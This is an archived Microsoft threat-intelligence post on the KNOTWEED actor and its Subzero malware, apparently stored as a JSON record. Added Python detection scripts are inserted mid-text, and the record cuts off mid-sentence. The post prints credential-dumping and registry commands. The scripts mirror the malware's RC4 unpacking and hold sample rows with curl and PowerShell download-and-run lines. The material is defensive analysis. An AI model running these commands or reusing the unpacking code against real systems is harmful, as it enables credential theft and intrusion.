{
	"id": "2d8673da-ecbe-4e7c-b66c-f092d58c40b4",
	"created_at": "2026-04-06T00:07:03.649733Z",
	"updated_at": "2026-04-10T03:36:47.812851Z",
	"deleted_at": null,
	"sha1_hash": "a7943f166d2ba5893bf3884ab55187e40e5b28ca",
	"title": "Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits | Microsoft Security Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1078485,
	"plain_text": "Untangling KNOTWEED: European private-sector offensive actor using\r\n0-day exploits | Microsoft Security Blog\r\nBy Microsoft Threat Intelligence\r\nPublished: 2022-07-27 · Archived: 2026-04-05 12:47:28 UTC\r\nApril 2023 update – Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned around the\r\ntheme of weather. KNOTWEED is now tracked as Denim Tsunami.\r\nTo learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a complete\r\nmapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming taxonomy.\r\nThe Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) found a private-sector offensive actor (PSOA) using multiple Windows and Adobe 0-day exploits, including one for the recently patched\r\nCVE-2022-22047, in limited and targeted attacks against European and Central American customers. The PSOA, which\r\nMSTIC tracks as KNOTWEED, developed malware called Subzero which was used in these attacks.\r\nThis blog details Microsoft’s analysis of the observed KNOTWEED activity and related malware used in targeted attacks\r\nagainst our customers. This information is shared with our customers and industry partners to improve detection of these\r\nattacks. Customers are encouraged to expedite deployment of the July 2022 Microsoft security updates to protect their\r\nsystems against exploits using CVE-2022-22047. Microsoft Defender Antivirus and Microsoft Defender for Endpoint have\r\nalso implemented detections against KNOTWEED’s malware and tools.\r\nPSOAs, which Microsoft also refers to as cyber mercenaries, sell hacking tools or services through a variety of business\r\nmodels. Two common models for this type of actor are access-as-a-service and hack-for-hire. 
In access-as-a-service, the\r\nactor sells full end-to-end hacking tools that can be used by the purchaser in operations, with the PSOA not involved in any\r\ntargeting or running of the operation. In hack-for-hire, detailed information is provided by the purchaser to the actor, who\r\nthen runs the targeted operations. Based on observed attacks and news reports, MSTIC believes that KNOTWEED may\r\nblend these models: they sell the Subzero malware to third parties but have also been observed using KNOTWEED-associated infrastructure in some attacks, suggesting more direct involvement.\r\nWho is KNOTWEED?\r\nKNOTWEED is an Austria-based PSOA named DSIRF. The DSIRF website [web archive link] says they provide services\r\n“to multinational corporations in the technology, retail, energy and financial sectors” and that they have “a set of highly\r\nsophisticated techniques in gathering and analyzing information.” They publicly offer several services including “an\r\nenhanced due diligence and risk analysis process through providing a deep understanding of individuals and entities” and\r\n“highly sophisticated Red Teams to challenge your company’s most critical assets.”\r\nHowever, multiple news reports have linked DSIRF to the development and attempted sale of a malware toolset called\r\nSubzero. MSTIC found the Subzero malware being deployed through a variety of methods, including 0-day exploits in\r\nWindows and Adobe Reader, in 2021 and 2022. As part of our investigation into the utility of this malware, Microsoft’s\r\ncommunications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and\r\nconfirmed that it was unauthorized, malicious activity. Observed victims to date include law firms, banks, and strategic\r\nconsultancies in countries such as Austria, the United Kingdom, and Panama. 
https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\r\nPage 1 of 11\r\nIt’s important to note that the identification of targets in a country doesn’t necessarily mean that a DSIRF customer resides in the same country, as international targeting is\r\ncommon.\r\nMSTIC has found multiple links between DSIRF and the exploits and malware used in these attacks. These include\r\ncommand-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account\r\nbeing used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source\r\nnews reports attributing Subzero to DSIRF.\r\nObserved actor activity\r\nKNOTWEED initial access\r\nMSTIC found KNOTWEED’s Subzero malware deployed in a variety of ways. In the following sections, the different\r\nstages of Subzero are referred to by their Microsoft Defender detection names: Jumplump for the persistent loader and\r\nCorelump for the main malware.\r\nKNOTWEED exploits in 2022\r\nIn May 2022, MSTIC found an Adobe Reader remote code execution (RCE) and a 0-day Windows privilege escalation\r\nexploit chain being used in an attack that led to the deployment of Subzero. The exploits were packaged into a PDF\r\ndocument that was sent to the victim via email. Microsoft was not able to acquire the PDF or Adobe Reader RCE portion of\r\nthe exploit chain, but the victim’s Adobe Reader version was released in January 2022, meaning that the exploit used was\r\neither a 1-day exploit developed between January and May, or a 0-day exploit. Based on KNOTWEED’s extensive use of\r\nother 0-days, we assess with medium confidence that the Adobe Reader RCE is a 0-day exploit. The Windows exploit was\r\nanalyzed by MSRC, found to be a 0-day exploit, and then patched in July 2022 as CVE-2022-22047. 
Interestingly, there\r\nwere indications in the Windows exploit code that it was also designed to be used from Chromium-based browsers, although\r\nwe’ve seen no evidence of browser-based attacks.\r\nThe CVE-2022-22047 vulnerability is related to an issue with activation context caching in the Client Server Run-Time\r\nSubsystem (CSRSS) on Windows. At a high level, the vulnerability could enable an attacker to provide a crafted assembly\r\nmanifest, which would create a malicious activation context in the activation context cache, for an arbitrary process. This\r\ncached context is used the next time the process is spawned.\r\nCVE-2022-22047 was used in KNOTWEED-related attacks for privilege escalation. The vulnerability also provided the\r\nability to escape sandboxes (with some caveats, as discussed below) and achieve system-level code execution. The exploit\r\nchain starts with writing a malicious DLL to disk from the sandboxed Adobe Reader renderer process. The CVE-2022-22047 exploit was then used to target a system process by providing an application manifest with an undocumented attribute\r\nthat specified the path of the malicious DLL. Then, when the system process next spawned, the attribute in the malicious\r\nactivation context was used, the malicious DLL was loaded from the given path, and system-level code execution was\r\nachieved.\r\nIt’s important to note that exploiting CVE-2022-22047 requires attackers to be able to write a DLL to disk. However, in the\r\nthreat model of sandboxes, such as that of Adobe Reader and Chromium, the ability to write out files where the attacker\r\ncannot control the path isn’t considered dangerous. 
Hence, these sandboxes aren’t a barrier to the exploitation of CVE-2022-22047.\r\nKNOTWEED exploits in 2021\r\nIn 2021, MSRC received a report of two Windows privilege escalation exploits (CVE-2021-31199 and CVE-2021-31201)\r\nbeing used in conjunction with an Adobe Reader exploit (CVE-2021-28550), all of which were patched in June 2021.\r\nMSTIC was able to confirm the use of these in an exploit chain used to deploy Subzero.\r\nWe were later able to link the deployment of Subzero to a fourth exploit, one related to a Windows privilege escalation\r\nvulnerability in the Windows Update Medic Service (CVE-2021-36948), which allowed an attacker to force the service to\r\nload an arbitrary signed DLL. The malicious DLL used in the attacks was signed by ‘DSIRF GmbH’.\r\nFigure 1. Valid digital signature from DSIRF on Medic Service exploit DLL\r\nMalicious Excel documents\r\nIn addition to the exploit chains, another method of access that led to the deployment of Subzero was an Excel file\r\nmasquerading as a real estate document. The file contained a malicious macro that was obfuscated with large chunks of\r\nbenign comments from the Kama Sutra, string obfuscation, and use of Excel 4.0 macros.\r\nFigure 2: Two examples of KNOTWEED Excel macro obfuscation\r\nAfter de-obfuscating strings at runtime, the VBA macro uses the ExecuteExcel4Macro function to call native Win32\r\nfunctions to load shellcode into memory allocated using VirtualAlloc. 
Each shellcode byte is copied individually into a newly\r\nallocated buffer using memset before CreateThread is called to execute the shellcode.\r\nFigure 3: Copying opcodes\r\nFigure 4: Calling CreateThread on shellcode\r\nThe following section describes the shellcode executed by the macro.\r\nKNOTWEED malware and tactics, techniques, and procedures (TTPs)\r\nCorelump downloader and loader shellcode\r\nThe downloader shellcode is the initial shellcode executed from either the exploit chains or malicious Excel documents. The\r\nshellcode’s purpose is to retrieve the Corelump second-stage malware from the actor’s command-and-control (C2) server.\r\nThe downloader shellcode downloads a JPEG image that contains extra encrypted data appended to the end of the file (past\r\nthe 0xFF 0xD9 marker that signifies the end of a JPEG file). The JPEG is then written to the user’s %TEMP% directory.\r\nFigure 5: One of the images embedded with the loader shellcode and Corelump\r\nThe downloader shellcode searches for a 16-byte marker immediately following the end of the JPEG. After finding the marker,\r\nthe downloader shellcode RC4-decrypts the loader shellcode using the next 16 bytes as the RC4 key. Finally, the loader\r\nshellcode RC4-decrypts the Corelump malware using a second RC4 key and manually loads it into memory.\r\nCorelump malware\r\nCorelump is the main payload and resides exclusively in memory to evade detection. It contains a variety of capabilities\r\nincluding keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins\r\ndownloaded from KNOTWEED’s C2 server.\r\nAs part of installation, Corelump makes copies of legitimate Windows DLLs and overwrites sections of them with malicious\r\ncode. 
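The JPEG carrier format described in the downloader section, as an added example that is not code from the Microsoft post or from KNOTWEED: it finds the real end of the image by walking the JPEG segment structure (a naive search for the first 0xFF 0xD9 stops at an embedded EXIF thumbnail, which is a complete JPEG with its own EOI), reports any bytes appended after EOI, and unwraps the two RC4 stages the way the downloader and loader shellcode are described as doing. The sample image, the 16-byte marker value, the keys, and the layout of the decrypted loader blob (the post does not say where the second RC4 key lives) are constructed assumptions.

```python
# Added example, not code from the Microsoft post or from KNOTWEED: parse a JPEG carrier the
# way the Subzero downloader is described as doing, and use the same parse as a hunting
# check for images with data appended past EOI. The sample image, the marker value, the
# keys and the loader blob layout are constructed assumptions (the post gives only the
# marker length, the key length and the cipher).
SOI, EOI = b'\xff\xd8', b'\xff\xd9'
MARKER = b'SUBZERO-MARKER16'  # constructed 16-byte marker; the real value is not in the post


def jpeg_end(data):
    """Offset just past the EOI marker, found by walking the segment structure.
    Searching for the first FF D9 is wrong: an EXIF thumbnail is a complete JPEG,
    with its own EOI, carried inside an APP1 segment."""
    if data[:2] != SOI:
        raise ValueError('not a JPEG')
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError('expected a marker at offset %d' % pos)
        marker = data[pos + 1]
        pos += 2
        if marker == 0xFF:      # fill byte: the real marker follows
            pos -= 1
            continue
        if marker == 0xD9:      # EOI
            return pos
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:
            continue            # stand-alone markers have no length field
        if pos + 2 > len(data):
            break
        pos += int.from_bytes(data[pos:pos + 2], 'big')  # segment length includes itself
        if marker == 0xDA:      # SOS: skip entropy-coded data; FF00 is stuffing, FFD0-D7 are restarts
            while pos + 1 < len(data) and not (data[pos] == 0xFF and data[pos + 1] != 0x00
                                               and not 0xD0 <= data[pos + 1] <= 0xD7):
                pos += 1
    raise ValueError('no EOI marker')


def rc4(key, data):
    """Textbook RC4; the post names RC4 for both Subzero stages."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def appended_bytes(data):
    """Everything after EOI. A clean image yields b''; a few padding bytes are
    common in the wild, so alert on the size of the trailer, not on mere presence."""
    return data[jpeg_end(data):]


def unpack_stages(data, marker=MARKER):
    """Mirror the downloader: find the marker after EOI, take the next 16 bytes as the
    RC4 key for the loader blob, then have the loader blob yield Corelump. The blob
    layout (b'LOADER:' + 16-byte second key + ciphertext) is this example's assumption."""
    tail = appended_bytes(data)
    at = tail.find(marker)
    if at < 0:
        raise ValueError('stage marker not found after EOI')
    loader = rc4(tail[at + 16:at + 32], tail[at + 32:])
    if not loader.startswith(b'LOADER:'):
        raise ValueError('loader blob did not decrypt as expected')
    return loader, rc4(loader[7:23], loader[23:])


def _segment(marker, payload):
    return b'\xff' + bytes([marker]) + (len(payload) + 2).to_bytes(2, 'big') + payload


def build_sample():
    """Constructed carrier: APP1 holding a thumbnail with its own EOI, entropy data
    with FF00 stuffing and an RST0 marker, then the appended stages."""
    thumb = SOI + _segment(0xDA, b'\x01') + b'\x12\xff\x00\x34' + EOI
    clean = (SOI + _segment(0xE1, b'Exif\x00\x00' + thumb)
             + _segment(0xDA, b'\x01\x01\x00\x00\x3f\x00') + b'\xab\xff\x00\xcd\xff\xd0\xef' + EOI)
    key1, key2 = bytes(range(16)), bytes(range(16, 32))
    corelump = b'CORELUMP payload (constructed)'
    loader = b'LOADER:' + key2 + rc4(key2, corelump)
    return clean, clean + MARKER + key1 + rc4(key1, loader), corelump


if __name__ == '__main__':
    clean, staged, corelump = build_sample()
    print('appended bytes, clean image :', len(appended_bytes(clean)))
    print('appended bytes, staged image:', len(appended_bytes(staged)))
    print('Corelump recovered          :', unpack_stages(staged)[1] == corelump)
```

For hunting, appended_bytes() over images landing in %TEMP% is the part that matters; the Sentinel query for abnormally large JPEGs listed later in the post is the coarse, size-only version of the same check, and the segment walk is what keeps legitimate images with EXIF thumbnails from showing up as hits.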
As part of this process, Corelump also modifies the fields in the PE header to accommodate the nefarious changes,\r\nsuch as adding new exported functions, disabling Control Flow Guard, and modifying the image file checksum with a\r\ncomputed value from CheckSumMappedFile. These trojanized binaries (Jumplump) are dropped to disk in\r\nC:\\Windows\\System32\\spool\\drivers\\color\\, and COM registry keys are modified for persistence (see the Behaviors section\r\nfor more information on COM hijacking).\r\nJumplump loader\r\nJumplump is responsible for loading Corelump into memory from the JPEG file in the %TEMP% directory. If Corelump is\r\nnot present, Jumplump attempts to download it again from the C2 server. Both Jumplump and the downloader shellcode are\r\nheavily obfuscated to make analysis difficult, with most instructions being followed by a jmp to another instruction/jmp\r\ncombination, giving a convoluted control flow throughout the program.\r\nFigure 6: Disassembly showing the jmp/instruction obfuscation used in Jumplump\r\nMex and PassLib\r\nKNOTWEED was also observed using the bespoke utility tools Mex and PassLib. These tools are developed by\r\nKNOTWEED and have capabilities derived from publicly available sources. 
Mex, for example, is a command-line\r\ntool containing several red teaming or security plugins copied from GitHub (listed below):\r\nChisel, Curl, Grouper2, Internal Monologue, Inveigh, Lockless, mimikatz, Ping Castle, Rubeus, SCShell, Seatbelt, SharpExec, SharpHound3, SharpOxidResolver, SharpPrinter, SpoolSample, StandIn\r\nPassLib is a custom password stealer tool capable of dumping credentials from a variety of sources including web browsers,\r\nemail clients, LSASS, LSA secrets, and the Windows credential manager.\r\nPost-compromise actions\r\nIn victims where KNOTWEED malware had been used, a variety of post-compromise actions were observed:\r\nSetting of UseLogonCredential to “1” to enable plaintext credentials:\r\nreg  add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f\r\nCredential dumping via comsvcs.dll:\r\nrundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump\r\nAttempt to access emails with dumped credentials from a KNOTWEED IP address\r\nUsing Curl to download KNOTWEED tooling from public file shares such as vultrobjects[.]com\r\nRunning PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF\r\nKNOTWEED infrastructure connections to DSIRF\r\nPivoting off a known command-and-control domain identified by MSTIC, acrobatrelay[.]com, RiskIQ expanded the view of\r\nKNOTWEED’s attack infrastructure. Leveraging unique patterns in the use of SSL certificates and other network\r\nfingerprints specific to the group and associated with that domain, RiskIQ identified a host of additional IP addresses under\r\nthe control of KNOTWEED.  
This infrastructure, largely hosted by Digital Ocean and Choopa, has been actively serving\r\nmalware since at least February of 2020 and continues through the time of this writing.\r\nRiskIQ next utilized passive DNS data to determine which domains those IPs resolved to at the time they were malicious.\r\nThis process yielded several domains with direct links to DSIRF, including demo3[.]dsirf[.]eu (the company’s own website),\r\nand several subdomains that appear to have been used for malware development, including debugmex[.]dsirflabs[.]eu\r\n(likely a server used for debugging malware with the bespoke utility tool Mex) and szstaging[.]dsirflabs[.]eu (likely a server\r\nused to stage Subzero malware).\r\nDetection and prevention\r\nMicrosoft will continue to monitor KNOTWEED activity and implement protections for our customers. The current\r\ndetections and IOCs detailed below are in place and protecting Microsoft customers across our security products. Additional\r\nadvanced hunting queries are also provided below to help organizations extend their protections and investigations of these\r\nattacks.\r\nBehaviors\r\nCorelump drops the Jumplump loader DLLs to C:\\Windows\\System32\\spool\\drivers\\color\\. This is a common directory used\r\nby malware as well as some legitimate programs, so writes of PE files to the folder should be monitored.\r\nJumplump uses COM hijacking for persistence, modifying COM registry keys to point to the Jumplump DLL in\r\nC:\\Windows\\System32\\spool\\drivers\\color\\. Modifications of default system CLSID values should be monitored to detect\r\nthis technique (e.g., HKLM\\SOFTWARE\\Classes\\CLSID\\{GUID}\\InProcServer32 Default value). 
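One way to turn the behaviors in this section into a triage pass, as an added example that is not code from the Microsoft post: it compares InProcServer32 default values for the five hijacked CLSIDs against the clean Windows 11 values given in this section (and treats any HKCU entry for those system CLSIDs as a hijack, because per-user Classes keys are consulted before HKLM), flags PE files written under the color profile folder, and matches process command lines for the post-compromise actions listed earlier. The telemetry rows, the field names and the regexes are this example's assumptions; the "#24" alternative is comsvcs.dll's export ordinal for MiniDump, which the post does not mention.

```python
# Added example, not code from the Microsoft post: a triage pass over endpoint telemetry
# for the behaviors described in this section. The event rows are constructed and the
# field names (type, key, value, path, head, cmdline) are assumptions standing in for
# Sysmon or Defender for Endpoint columns.
import re

COLOR_DIR = r'c:\windows\system32\spool\drivers\color'

# Clean Windows 11 InProcServer32 defaults for the five CLSIDs Jumplump hijacks (from the post).
CLEAN_CLSID = {
    '{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}': r'%SystemRoot%\System32\ApplicationFrame.dll',
    '{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}': r'%SystemRoot%\system32\propsys.dll',
    '{4590f811-1d3a-11d0-891f-00aa004b2e24}': r'%SystemRoot%\system32\wbem\wbemprox.dll',
    '{4de225bf-cf59-4cfc-85f7-68b90f185355}': r'%SystemRoot%\system32\wbem\wmiprvsd.dll',
    '{f56f6fdd-aa9d-4618-a949-c1b91af43b1a}': r'%SystemRoot%\System32\Actioncenter.dll',
}
INPROC_RE = re.compile(r'classes\\clsid\\(\{[0-9a-f-]{36}\})\\inprocserver32$', re.I)

# Command-line rules for the post-compromise actions listed earlier. "#24" is comsvcs.dll's
# export ordinal for MiniDump, a variant the post does not mention.
CMDLINE_RULES = [
    ('WDigest UseLogonCredential set to 1 (plaintext credentials)',
     re.compile(r'securityproviders\\wdigest\b.*uselogoncredential.*(?:/d|-value)\s+(?:0x)?0*1\b', re.I)),
    ('LSASS minidump via comsvcs.dll',
     re.compile(r'comsvcs\.dll\s*,?\s*(?:minidump|#24)\b', re.I)),
    ('curl saving a file fetched from the internet',
     re.compile(r'\bcurl(?:\.exe)?\b(?=.*\s(?:-o|--output|--remote-name)\b)(?=.*https?://)', re.I)),
    ('PowerShell executing content from an internet location',
     re.compile(r'\bpowershell(?:\.exe)?\b.*\b(?:iex|invoke-expression|downloadstring|iwr|irm'
                r'|invoke-webrequest|invoke-restmethod)\b.*https?://', re.I)),
]


def norm_path(value):
    v = value.strip().strip('"').lower()
    return v.replace('%systemroot%', r'c:\windows').replace('%windir%', r'c:\windows')


def check_registry(key, value):
    """InProcServer32 default writes: into the color folder, away from the Windows 11
    baseline, or under HKCU for a system CLSID (per-user Classes keys take precedence
    over HKLM, so such an entry is a hijack whatever value it carries)."""
    m = INPROC_RE.search(key.strip().rstrip('\\'))
    if not m:
        return None
    clsid, target = m.group(1).lower(), norm_path(value)
    if target.startswith(COLOR_DIR):
        return f'COM hijack: {clsid} now loads {target}'
    if clsid in CLEAN_CLSID:
        if key.lower().startswith(('hkcu', 'hkey_current_user')):
            return f'COM hijack: per-user override of system CLSID {clsid}'
        if target != norm_path(CLEAN_CLSID[clsid]):
            return f'COM hijack: {clsid} changed from baseline to {target}'
    return None


def check_file(path, head):
    """PE files (MZ header, or .dll/.exe when no header bytes are logged) under the color folder."""
    p = norm_path(path)
    if p.startswith(COLOR_DIR + '\\') and (head[:2] == b'MZ' or p.endswith(('.dll', '.exe'))):
        return f'PE dropped in color folder: {p}'
    return None


def check_cmdline(cmdline):
    line = ' '.join(cmdline.split())  # collapse runs of spaces, as in the observed reg.exe command
    return [name for name, rx in CMDLINE_RULES if rx.search(line)]


def triage(events):
    findings = []
    for ev in events:
        if ev['type'] == 'registry':
            hits = [check_registry(ev['key'], ev['value'])]
        elif ev['type'] == 'file':
            hits = [check_file(ev['path'], ev['head'])]
        else:
            hits = check_cmdline(ev['cmdline'])
        findings.extend(h for h in hits if h)
    return findings


SAMPLE_EVENTS = [  # constructed telemetry, one row per event
    {'type': 'registry', 'key': r'HKLM\SOFTWARE\Classes\CLSID\{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}\InProcServer32',
     'value': r'%SystemRoot%\System32\ApplicationFrame.dll'},                    # unchanged baseline
    {'type': 'registry', 'key': r'HKLM\SOFTWARE\Classes\CLSID\{4590f811-1d3a-11d0-891f-00aa004b2e24}\InProcServer32',
     'value': r'C:\Windows\System32\spool\drivers\color\wbemprox.dll'},         # Jumplump-style hijack
    {'type': 'registry', 'key': r'HKCU\Software\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32',
     'value': r'%SystemRoot%\system32\propsys.dll'},                             # per-user override
    {'type': 'file', 'path': r'C:\Windows\System32\spool\drivers\color\ApplicationFrame.dll', 'head': b'MZ'},
    {'type': 'file', 'path': r'C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm', 'head': b'\x00\x00'},
    {'type': 'process', 'cmdline': r'reg  add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f'},
    {'type': 'process', 'cmdline': r'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f'},
    {'type': 'process', 'cmdline': r'rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\Users\Public\ls.dmp full'},
    {'type': 'process', 'cmdline': r'curl.exe -o C:\Users\Public\mex.exe https://vultrobjects.com/constructed/mex.exe'},
    {'type': 'process', 'cmdline': 'powershell.exe -nop -w hidden -c iex(iwr https://gist.githubusercontent.com/constructed/raw/x.ps1)'},
]

if __name__ == '__main__':
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Run as a script it prints seven findings from the ten constructed rows; the unchanged baseline value, the colour profile (.icm) write and the reg.exe command that sets UseLogonCredential back to 0 are deliberately left silent, since a rule that fires on any touch of the WDigest key will page you for your own hardening scripts.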
The five CLSIDs used by\r\nJumplump are listed below with their original clean values on Windows 11:\r\n{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea} = “%SystemRoot%\\System32\\ApplicationFrame.dll”\r\n{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d} = “%SystemRoot%\\system32\\propsys.dll”\r\n{4590f811-1d3a-11d0-891f-00aa004b2e24} = “%SystemRoot%\\system32\\wbem\\wbemprox.dll”\r\n{4de225bf-cf59-4cfc-85f7-68b90f185355} = “%SystemRoot%\\system32\\wbem\\wmiprvsd.dll”\r\n{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} = “%SystemRoot%\\System32\\Actioncenter.dll”\r\nMany of the post-compromise actions can be detected based on their command lines. Customers should monitor for possible\r\nmalicious activity such as PowerShell executing scripts from internet locations, modification of commonly abused registry\r\nkeys such as HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest, and LSASS credential dumping via\r\nminidumps.\r\nRecommended customer actions\r\nThe techniques used by the actor and described in the Observed actor activity section can be mitigated by adopting the\r\nsecurity considerations provided below:\r\nAll customers should prioritize patching of CVE-2022-22047.\r\nConfirm that Microsoft Defender Antivirus is updated to security intelligence update 1.371.503.0 or later to detect the\r\nrelated indicators.\r\nUse the included indicators of compromise to investigate whether they exist in your environment and assess for\r\npotential intrusion.\r\nChange Excel macro security settings to control which macros run and under what circumstances when you open a\r\nworkbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by\r\nAntimalware Scan Interface (AMSI) is on. 
This feature, enabled by default, is on if the Group Policy setting for\r\nMacro Run Time Scan Scope is set to “Enable for All Files” or “Enable for Low Trust Files”.\r\nEnable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is\r\nenforced for all remote connectivity. Note: Microsoft strongly encourages all customers to download and use passwordless solutions like Microsoft Authenticator to secure accounts.\r\nReview all authentication activity for remote access infrastructure, with a particular focus on accounts configured\r\nwith single-factor authentication, to confirm authenticity and investigate any anomalous activity.\r\nIndicators of compromise (IOCs)\r\nThe following list provides IOCs observed during our investigation. We encourage our customers to investigate these\r\nindicators in their environments and implement detections and protections to identify past related activity and prevent future\r\nattacks against their systems. All sample hashes are available in VirusTotal.\r\nIndicator | Type | Description\r\n78c255a98003a101fa5ba3f49c50c6922b52ede601edac5db036ab72efc57629 | SHA-256 | Malicious Excel document and VBA\r\n0588f61dc7e4b24554cffe4ea56d043d8f6139d2569bc180d4a77cf75b68792f | SHA-256 | Malicious Excel document and VBA\r\n441a3810b9e89bae12eea285a63f92e98181e9fb9efd6c57ef6d265435484964 | SHA-256 | Jumplump malware\r\ncbae79f66f724e0fe1705d6b5db3cc8a4e89f6bdf4c37004aa1d45eeab26e84b | SHA-256 | Jumplump malware\r\nfd6515a71530b8329e2c0104d0866c5c6f87546d4b44cc17bbb03e64663b11fc | SHA-256 | Jumplump malware\r\n5d169e083faa73f2920c8593fb95f599dad93d34a6aa2b0f794be978e44c8206 | SHA-256 | Jumplump malware\r\n7f29b69eb1af1cc6c1998bad980640bfe779525fd5bb775bc36a0ce3789a8bfc | SHA-256 | Jumplump malware\r\n02a59fe2c94151a08d75a692b550e66a8738eb47f0001234c600b562bf8c227d | SHA-256 | Jumplump malware\r\n7f84bf6a016ca15e654fb5ebc36fd7407cb32c69a0335a32bfc36cb91e36184d | SHA-256 | Jumplump malware\r\nafab2e77dc14831f1719e746042063a8ec107de0e9730249d5681d07f598e5ec | SHA-256 | Jumplump malware\r\n894138dfeee756e366c65a197b4dbef8816406bc32697fac6621601debe17d53 | SHA-256 | Jumplump malware\r\n4611340fdade4e36f074f75294194b64dcf2ec0db00f3d958956b4b0d6586431 | SHA-256 | Jumplump malware\r\nc96ae21b4cf2e28eec222cfe6ca903c4767a068630a73eca58424f9a975c6b7d | SHA-256 | Corelump malware\r\nfa30be45c5c5a8f679b42ae85410f6099f66fe2b38eb7aa460bcc022babb41ca | SHA-256 | Mex tool\r\ne64bea4032cf2694e85ede1745811e7585d3580821a00ae1b9123bb3d2d442d6 | SHA-256 | PassLib tool\r\nacrobatrelay[.]com | Domain | C2\r\nfinconsult[.]cc | Domain | C2\r\nrealmetaldns[.]com | Domain | C2\r\nNOTE: These indicators should not be considered exhaustive for this observed activity.\r\nDetections\r\nMicrosoft Defender Antivirus\r\nMicrosoft Defender Antivirus detects the malware tools and implants used by KNOTWEED starting with signature build\r\n1.371.503.0 as the following family names:\r\nBackdoor:O97M/JumplumpDropper\r\nTrojan:Win32/Jumplump\r\nTrojan:Win32/Corelump\r\nHackTool:Win32/Mexlib\r\nTrojan:Win32/Medcerc\r\nBehavior:Win32/SuspModuleLoad\r\nMicrosoft Defender for Endpoint\r\nMicrosoft Defender for Endpoint customers may see the following alerts as an indication of a possible attack. 
These alerts\r\nare not necessarily an indication of KNOTWEED compromise:\r\nCOM Hijacking – Detects multiple behaviors, including Jumplump malware persistence techniques.\r\nPossible privilege escalation using CTF module – Detects a possible privilege escalation behavior associated with\r\nCVE-2022-22047; also detects an attempt to perform local privilege escalation by launching an elevated process and\r\nloading an untrusted module to perform malicious activities.\r\nKNOTWEED actor activity detected – Detects KNOTWEED actor activities.\r\nWDigest configuration change – Detects potential retrieval of clear text password from changes to the\r\nUseLogonCredential registry key.\r\nSensitive credential memory read – Detects LSASS credential dumping via minidumps.\r\nSuspicious Curl behavior – Detects the use of Curl to download KNOTWEED tooling from public file shares.\r\nSuspicious screen capture activity – Detects Corelump behavior of capturing screenshots of the compromised system.\r\nHunting queries\r\nMicrosoft Sentinel\r\nThe following resources are available to Microsoft Sentinel customers to identify the activity outlined in the blog post.\r\nMicrosoft Defender Antivirus detections related to KNOTWEED\r\nThis query identifies occurrences of Microsoft Defender Antivirus detections listed in this blog post:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDAVDetection.yaml\r\nFile hash IOCs related to KNOTWEED\r\nThis query identifies matches based on file hash IOCs related to KNOTWEED across a range of common Microsoft Sentinel\r\ndata sets:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDFileHashesJuly2022.yaml\r\nDomain IOCs related to KNOTWEED\r\nThis query identifies matches based on domain IOCs related to KNOTWEED across a range of common Microsoft Sentinel\r\ndata 
sets:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDC2DomainsJuly2022.yaml\r\nCOM registry key modified to point to Color Profile folder\r\nThis query identifies modifications to COM registry keys to point to executable files in\r\nC:\\Windows\\System32\\spool\\drivers\\color\\:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/COMRegistryKeyModifiedtoPointtoFileinColorDrivers.yaml\r\nPE file dropped in Color Profile folder\r\nThis query looks for PE files being created in the C:\\Windows\\System32\\spool\\drivers\\color\\ folder:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Detections/DeviceFileEvents/PEfiledroppedinColorDriversFolder.yaml\r\nAbnormally large JPEG downloaded from new source\r\nThis query looks for downloads of JPEG files from remote sources, where the file size is abnormally large, and not from a\r\ncommon source:\r\nhttps://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/AbnormallyLargeJPEGFiledDownloadedfromNewSource.yaml\r\nDownloading new file using Curl\r\nThis query looks for new files being downloaded using 